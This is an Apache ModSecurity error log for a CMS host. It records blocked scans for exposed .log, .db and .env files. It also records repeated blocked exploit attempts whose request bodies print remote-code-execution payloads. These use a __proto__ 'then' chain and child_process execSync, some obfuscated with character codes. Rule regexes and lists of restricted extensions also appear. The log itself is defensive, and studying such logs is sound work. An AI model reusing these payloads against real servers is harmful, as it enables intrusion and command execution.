"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aTPzuusuS7TwaJcc3vHz7QAAAMU"] [Sat Dec 06 11:13:30.998131 2025] [:error] [pid 28201:tid 28229] [client 16.146.2.134:47820] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aTPzugaaBQA8K9Y2IUPb9QAAABc"] [Sat Dec 06 11:13:31.611369 2025] [:error] [pid 28201:tid 28224] [client 16.146.2.134:47826] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aTPzuwaaBQA8K9Y2IUPb9gAAABI"] [Wed Dec 10 00:20:26.726963 2025] [:error] [pid 10047:tid 10071] [client 45.148.10.23:22202] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqm-neFT78GCR9wgI1wAAANU"] [Wed Dec 10 00:20:26.937629 2025] [:error] [pid 8901:tid 8998] [client 45.148.10.23:22218] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTigqoPZrqwqhQFTx1EvjQAAAIE"] [Wed Dec 10 00:20:26.985050 2025] [:error] [pid 12415:tid 12441] [client 45.148.10.23:22222] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aTigqiehfogz7atDeBBh6gAAAQo"] [Wed Dec 10 00:20:27.028145 2025] [:error] [pid 12415:tid 12447] [client 45.148.10.23:22226] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/laravel.log"] [unique_id "aTigqyehfogz7atDeBBh6wAAARA"] [Wed Dec 10 00:20:27.068715 2025] [:error] [pid 12415:tid 12448] [client 45.148.10.23:22228] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/debug.log"] [unique_id "aTigqyehfogz7atDeBBh7AAAARE"] [Wed Dec 10 00:20:27.109780 2025] [:error] [pid 8901:tid 9029] [client 45.148.10.23:22238] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjgAAAJE"] [Wed Dec 10 00:20:27.164564 2025] [:error] [pid 8901:tid 9002] [client 45.148.10.23:22240] [client 45.148.10.23] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aTigq4PZrqwqhQFTx1EvjwAAAIM"] [Wed Dec 10 01:38:35.847359 2025] [:error] [pid 8900:tid 8993] [client 43.207.175.198:48588] [client 43.207.175.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aTiy-4fTNommSAYzc_YuWgAAAEc"] [Wed Dec 10 03:58:29.030060 2025] [:error] [pid 3655:tid 3659] [client 44.222.79.145:42906] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTjTxaNexQYgxDKgoqtRegAAAMI"] [Wed Dec 10 12:22:42.705465 2025] [:error] [pid 8150:tid 8179] [client 172.190.142.176:39276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Dec 11 04:18:14.373716 2025] [:error] [pid 5581:tid 5607] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpAAAANg"] [Thu Dec 11 04:18:14.468810 2025] [:error] [pid 5581:tid 5588] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/app/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpQAAAMU"] [Thu Dec 11 04:18:14.559648 2025] [:error] [pid 5581:tid 5592] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/config/.env"] [unique_id "aTop5kz8J_6v__pKu_PfpwAAAMk"] [Thu Dec 11 04:18:14.660813 2025] [:error] [pid 5581:tid 5589] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/api/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqAAAAMY"] [Thu Dec 11 04:18:14.755790 2025] [:error] [pid 5581:tid 5604] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/admin/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqQAAANU"] [Thu Dec 11 04:18:14.844436 2025] [:error] [pid 5581:tid 5603] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/backend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqgAAANQ"] [Thu Dec 11 04:18:14.935305 2025] [:error] [pid 5581:tid 5593] [client 44.222.79.145:51472] [client 44.222.79.145] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-4000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms.dev-unit.com"] [uri "/frontend/.env"] [unique_id "aTop5kz8J_6v__pKu_PfqwAAAMo"] [Thu Dec 11 14:58:49.506154 2025] [:error] [pid 5424:tid 5502] [client 130.33.46.121:8168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Dec 11 15:00:22.499262 2025] [:error] [pid 5429:tid 5531] [client 130.33.46.121:14274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Fri Dec 12 00:28:16.833475 2025] [:error] [pid 5424:tid 5502] [client 46.101.119.189:41072] [client 46.101.119.189] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)]; } catch(e) {} if (!req) { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aTtFgCXyTIYstocRFEFbYwAAAEk"] [Tue Dec 16 16:53:33.968708 2025] [:error] [pid 23733:tid 23777] [client 18.175.53.42:39794] [client 18.175.53.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aUFybfszPqr_jbGu4RjzXAAAAsM"] [Tue Dec 16 18:34:11.921971 2025] [:error] [pid 16797:tid 16865] [client 3.127.242.241:33266] [client 3.127.242.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aUGKA4wdxKC99oXxvA8ZfQAAAow"] [Fri Dec 19 07:01:59.452063 2025] [:error] [pid 10837:tid 10857] [client 164.90.183.185:5220] [client 164.90.183.185] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aUTcR23ie3knXw3FZp5UKwAAANI"] [Sun Dec 21 10:01:11.016801 2025] [:error] [pid 2592:tid 2606] [client 139.59.133.87:26352] [client 139.59.133.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: )() | found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$b0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22try { var res = (function(){ var req = null; try { req = \\x5c\\x5cu0070\\x5c\\x5cu0072\\x5c\\x5cu006f\\x5c\\x5cu0063\\x5c\\x5cu0065\\x5c\\x5cu0073\\x5c\\x5cu0073[string.fromcharcode(109,97,105,110,77,111,100,117,108,101)][string.fromcharcode(114,101,113,117,105,114,101)..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [ [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aUepRtBPR4UQWKfYLa8koAAAAMw"] [Wed Dec 24 08:54:25.176243 2025] [:error] [pid 3222:tid 3244] [client 4.217.183.253:43531] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Dec 27 07:50:13.705687 2025] [:error] [pid 6397:tid 6472] [client 13.214.210.12:50712] [client 13.214.210.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aU9zlbVQSsbzOWeYNjE4JgAAANE"] [Fri Jan 02 02:22:03.137541 2026] [:error] 